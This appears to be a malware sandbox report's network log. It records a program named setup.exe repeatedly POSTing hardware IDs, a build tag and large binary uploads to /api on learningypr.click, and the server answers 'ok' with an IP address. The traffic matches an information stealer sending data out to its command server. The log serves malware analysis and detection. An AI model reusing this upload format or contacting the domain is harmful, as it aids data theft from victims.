                                                                                                                                                                                                                                2024-12-30 18:10:15 UTC8729OUTData Raw: 2d 2d 4b 4b 47 30 32 4e 36 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 4b 4b 47 30 32 4e 36 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 4b 47 30 32 4e 36 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 4b 4b 47 30 32 4e 36 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                Data Ascii: --KKG02N6EUContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--KKG02N6EUContent-Disposition: form-data; name="pid"2--KKG02N6EUContent-Disposition: form-data; name="lid"hRjzG3--DRON--KKG02N6EUContent-Dispo
                                                                                                                                                                                                                                2024-12-30 18:10:16 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:16 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=s4g86liraq4pgccmevk940b6l7; expires=Fri, 25 Apr 2025 11:56:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0yT3ywByh13Jhe%2BGtOtfJBsq2wy7LE52CzfJ42b5hNhidrAWvWtHgPid7Hz4lBqL7F5w3S3v69%2BjMl5alu6fPiHk%2Fj%2Btj6ZThrmxjnCnkPZ58gE26akc%2F3wXk5sHqEA0FL0sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc51d94b41a6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9660&delivery_rate=1798029&cwnd=239&unsent_bytes=0&cid=91044bda7141bd21&ts=645&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-30 18:10:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.449739104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:17 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=POEN4VU2
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 20376
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:17 UTC15331OUTData Raw: 2d 2d 50 4f 45 4e 34 56 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 50 4f 45 4e 34 56 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 4f 45 4e 34 56 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 50 4f 45 4e 34 56 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                Data Ascii: --POEN4VU2Content-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--POEN4VU2Content-Disposition: form-data; name="pid"3--POEN4VU2Content-Disposition: form-data; name="lid"hRjzG3--DRON--POEN4VU2Content-Dispositi
                                                                                                                                                                                                                                2024-12-30 18:10:17 UTC5045OUTData Raw: b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 00
                                                                                                                                                                                                                                Data Ascii: Mn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                                                                2024-12-30 18:10:19 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:19 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=8vt32gbnmgsu9rbi7ip98u61mg; expires=Fri, 25 Apr 2025 11:56:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLWUuQLXzJIzkaU2rQIxmP6X8GE6Id0q8GGK6JiCWZ481NjQwTIv6pvdBwKvXJGkXZpB6vUYH2jCG1cAKmlWz8HnyoLuugiuGv%2BKR9jDoa4C1slOf0Y4Ul5HAyiGgO4CWwjeag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc5a68e972b9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1799&rtt_var=973&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21329&delivery_rate=975935&cwnd=214&unsent_bytes=0&cid=456d8d22d706bb0f&ts=2330&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-30 18:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.449741104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:20 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=Z88PPM2L
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 7069
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:20 UTC7069OUTData Raw: 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                Data Ascii: --Z88PPM2LContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--Z88PPM2LContent-Disposition: form-data; name="pid"1--Z88PPM2LContent-Disposition: form-data; name="lid"hRjzG3--DRON--Z88PPM2LContent-Dispositi
                                                                                                                                                                                                                                2024-12-30 18:10:21 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=r1u59o5hb4j83ofq1i152lrcj5; expires=Fri, 25 Apr 2025 11:56:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdc2xwQCaq1%2Bm13TVJnOsfqUnSu9KDWiY1YvWfBwun2WmDVYAbk9qyewQIyxd91DxIIf%2BnLImqCF3VyZjG6gQGl2KXkVd52rlhrv0vdfDGcWnozSpLClRhOZjm%2BJ%2Fbs3ppOHSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc6f2ba31875-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1639&rtt_var=625&sent=7&recv=12&lost=0&retrans=0&sent_bytes=2841&recv_bytes=7977&delivery_rate=1736028&cwnd=153&unsent_bytes=0&cid=a7b3cd71e8d7e060&ts=477&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-30 18:10:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.449742104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:21 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=HXTEUTBDR7M2M2TJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 1243
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:21 UTC1243OUTData Raw: 2d 2d 48 58 54 45 55 54 42 44 52 37 4d 32 4d 32 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 48 58 54 45 55 54 42 44 52 37 4d 32 4d 32 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 58 54 45 55 54 42 44 52 37 4d 32 4d 32 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 48 58 54
                                                                                                                                                                                                                                Data Ascii: --HXTEUTBDR7M2M2TJContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--HXTEUTBDR7M2M2TJContent-Disposition: form-data; name="pid"1--HXTEUTBDR7M2M2TJContent-Disposition: form-data; name="lid"hRjzG3--DRON--HXT
                                                                                                                                                                                                                                2024-12-30 18:10:24 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:23 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=2ui4lqrv529biuf2ns4iorcoh1; expires=Fri, 25 Apr 2025 11:57:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91C%2BoqyNidKsKCVNFntyBidSlR31f4ae2brg0a%2FbLt%2FdXOn5JCmbgOe%2FjqPCDWBT64Qe4NgPGWSc6FQ%2BNc86q0Q%2BRalB0vxN7P78B%2FGc8PwBCJpYA4ZO8GRwGngl4r1FhC3UpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc769e6572b9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1823&rtt_var=689&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2159&delivery_rate=1580942&cwnd=214&unsent_bytes=0&cid=1690d31ef2dd50f0&ts=2214&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-30 18:10:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.449743104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=7DH7ZQOL75A5IGHY65
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 585356
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: 2d 2d 37 44 48 37 5a 51 4f 4c 37 35 41 35 49 47 48 59 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 37 44 48 37 5a 51 4f 4c 37 35 41 35 49 47 48 59 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 44 48 37 5a 51 4f 4c 37 35 41 35 49 47 48 59 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d
                                                                                                                                                                                                                                Data Ascii: --7DH7ZQOL75A5IGHY65Content-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--7DH7ZQOL75A5IGHY65Content-Disposition: form-data; name="pid"1--7DH7ZQOL75A5IGHY65Content-Disposition: form-data; name="lid"hRjzG3--DRON
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: 0d 9b b9 4f 71 ae ff d0 20 6b 43 f2 e0 66 4c ef 48 88 55 03 ff 73 3e 76 53 cb c9 12 e4 3e d2 f1 4c 80 26 23 15 03 87 46 51 8c 78 33 1f 43 44 43 62 46 4b d8 e1 84 fd 93 3b 17 2a 5a c4 60 1f f0 5d d6 04 97 ab 44 fa 37 96 7b b3 f0 2c c0 89 90 35 f6 3d 32 39 a0 a9 fb f3 4f 4a 80 2c 17 08 fc 96 1c 99 83 f5 4a 67 3b 05 e3 17 ed 80 5b 89 ea e3 2e e3 20 d5 aa 87 5b 04 df 23 bc db 91 24 58 fd df e0 22 14 6a f7 f1 48 8b 93 99 19 97 a1 a0 80 33 aa 5f 9b 85 5b 56 91 48 2e 74 30 c8 8c a0 de 05 c9 5d f6 6e f8 37 fd 0a 92 2e 2b 87 87 23 4f 05 b5 ba 4c 0b 77 bb 28 d2 e2 3e 87 aa 57 b5 fa 52 75 db 65 3f 5e b1 d7 06 2b e2 15 e7 ec 45 3e 1f 8a bc ea 2f 43 90 22 4b 8e 04 71 4e 17 15 aa 3a 34 90 da d1 d7 68 39 2d 3e 42 07 f5 6d 06 b6 df ce db e9 73 d1 23 77 cd d2 82 38 41 0f
                                                                                                                                                                                                                                Data Ascii: Oq kCfLHUs>vS>L&#FQx3CDCbFK;*Z`]D7{,5=29OJ,Jg;[. [#$X"jH3_[VH.t0]n7.+#OLw(>WRue?^+E>/C"KqN:4h9->Bms#w8A
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: c0 cf ba ff aa fc 26 2a b5 43 ee 5e 37 4e d5 09 18 02 4a 23 6f e6 e3 7a fd 0a 84 1b 2a 75 f7 13 a6 d8 ae 0a 14 17 ba 13 db 77 d9 71 fa 3c 82 83 cb 2d bb b0 1d d5 a4 25 59 82 3f f3 3c 7c ce bd 7e 86 e7 8e 8c cf e2 0c 93 98 96 23 38 7b 7c 39 8e ed ab 29 82 93 75 bf 8f 54 27 12 a9 ba 55 8c f9 79 7d df cd b7 46 66 85 e5 6a 80 ad 2a c4 bb 57 93 24 f1 17 b3 eb d8 02 4b 8c a2 b0 d5 f9 00 7f 2e a4 67 bb e5 2a 1f a2 c1 61 f7 d2 d7 83 4d 21 47 0a 3f ab 35 ce 13 9b 13 d0 6d 9f 41 86 70 38 be 9f 7f 5a f5 3f 17 d9 97 0d 55 fd 5a 0d 46 c3 85 30 1b 37 8e 89 d4 cb 4d 52 ad 50 11 de 9c 73 8f a6 76 f8 db 3e 93 33 dd 40 99 1a 4a 7d 22 cf ac eb 5c 58 dc f0 ff 3b 3b 7e ae db 09 61 a8 c9 be 2c 0e 32 8e b5 b3 ab 12 8f 32 15 13 f6 56 b5 2b 20 79 7b 29 89 b2 41 56 eb df 7c 86 24
                                                                                                                                                                                                                                Data Ascii: &*C^7NJ#oz*uwq<-%Y?<|~#8{|9)uT'Uy}Ffj*W$K.g*aM!G?5mAp8Z?UZF07MRPsv>3@J}"\X;;~a,22V+ y{)AV|$
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: 69 8c 00 c5 a0 8a 24 dd 73 fa d6 68 a4 0e 39 9a 67 78 d9 74 f9 ef d1 ed f0 22 8b fc 7d b7 42 82 79 88 da eb ad 3b 5d 07 65 39 2d 68 70 5e e5 cf b0 d2 9b cf af 31 7f 9e f2 de 10 20 9d 80 78 8a d2 20 a9 7f fe a9 62 5a 67 3a 83 87 db 86 4f 4c 5f 6f 06 43 e9 7c f8 99 7b d0 81 d2 01 db ea 8b 17 6e 6f 59 c3 be aa 95 2f 94 27 9c 28 59 87 b1 4e 67 d4 40 b7 96 56 36 bd 75 85 31 ef 14 3d 7a 4a 8f 4b b4 48 93 f1 29 73 a6 a9 f2 2f 20 a9 94 2f 53 0c ad 63 d0 6d 25 ec 28 e3 bf fa b8 c2 56 5e 06 9c 60 3b 6d 1a 3c e3 6d d5 6b b0 73 6e 8a 7d b5 7b 3f 0e 83 c9 ef 95 a3 72 13 9c ee b0 fb d8 d3 a9 c0 d0 98 d6 a3 72 a3 95 1b 3b d3 f3 99 28 cd 92 b5 5a e6 c2 f4 be 10 f6 27 d9 7f 8d c5 c5 c8 ac 53 cb a5 ce 2b c0 e2 1f 4e 95 de 27 43 38 17 7c 73 f6 fd 05 b7 e4 54 c5 0f bc 2a 02
                                                                                                                                                                                                                                Data Ascii: i$sh9gxt"}By;]e9-hp^1 x bZg:OL_oC|{noY/'(YNg@V6u1=zJKH)s/ /Scm%(V^`;m<mksn}{?rr;(Z'S+N'C8|sT*
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: 1a 9e 6a 74 92 2c bd 54 c4 5d 03 44 af 40 8b b6 1a 73 45 7f 02 5c 9a b4 1a 63 8f a6 59 b2 47 d2 b1 f1 88 c7 b6 17 6f 37 f6 a8 3a 6f 18 9d 02 6d 34 be 8e f5 61 db b7 52 dd 2f c2 f3 54 34 a0 a2 9f 49 84 04 d0 26 19 49 3c e1 c0 83 ea 55 c8 89 c4 21 c8 de e0 2e 7f 3e 0d 8e a8 0f ef 59 3c 0d cc 0f e2 4e e3 a5 b6 3b fd 43 4b 1a 37 54 e9 f2 8f 09 93 f3 19 fc 89 4c cd bd 39 18 2e 77 d6 84 b9 2a 55 e9 36 27 44 2a 9c 78 9f 8d 53 3b 31 63 c1 6f 74 dd 0b d1 a9 de 74 5b 6d 41 e4 48 03 d9 41 00 1c 19 8b f9 c9 e6 9a 92 ae 1d dd 34 96 cb 63 de d3 cd aa fc c7 1f ff 29 e2 96 5c 12 98 69 dd a1 9a 0b 09 d6 11 3d 30 c3 19 1e 57 14 42 5a b1 4b 73 27 44 e1 9e 69 5f 30 2f 73 72 fa b7 34 b9 a4 d1 f9 cb 2a fc cf 19 42 9c f0 ff 0e 5f a4 42 55 7b 7d 74 56 f2 af 8e c2 c1 27 be 8c 26
                                                                                                                                                                                                                                Data Ascii: jt,T]D@sE\cYGo7:om4aR/T4I&I<U!.>Y<N;CK7TL9.w*U6'D*xS;1cott[mAHA4c)\i=0WBZKs'Di_0/sr4*B_BU{}tV'&
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: f1 a7 c0 55 11 67 47 9e 5e e8 d0 81 7c 84 ef b4 70 9d 48 03 31 3d 85 d3 d8 93 5f 86 f1 8a 69 85 81 f1 66 bc 31 de b1 6e 87 f6 ec 3c 6d d2 15 98 ef 05 61 80 b9 96 b7 af 7a 75 1e 81 01 27 07 c8 fd 12 ba ce 42 54 da b3 f9 d9 56 8b bb d7 0f 13 00 e5 8b c0 f8 ed c0 9d 66 7c 80 9b 51 a4 d7 43 e4 97 0d 50 26 02 cc 95 a2 a4 d4 b9 8b fd d4 65 c8 60 fb 58 cf f6 9b 11 cf 73 f4 e2 f9 34 90 92 d5 c9 02 2a 7d 09 2d 42 9d 47 44 fe 77 f6 23 9e ea 84 87 51 af fe ef b4 97 f3 ef 84 8e 02 1b bd e5 8d b7 77 bb 66 de de 65 bf d8 df 64 95 e8 3a b9 59 f4 6a dd 7a 5c a0 be 72 84 5f fe 06 a5 62 2e 39 17 ef f0 f5 26 3a f7 65 4f de c7 26 5e b7 45 04 5d 30 6d d5 f2 02 1f 2d 3f 8e 64 19 1e 18 16 19 74 9b 07 c0 58 24 a1 91 e4 6e 10 20 7e 99 3c c3 e6 56 78 c3 f7 87 04 ab 75 c5 b0 a6 27
                                                                                                                                                                                                                                Data Ascii: UgG^|pH1=_if1n<mazu'BTVf|QCP&e`Xs4*}-BGDw#Qwfed:Yjz\r_b.9&:eO&^E]0m-?dtX$n ~<Vxu'
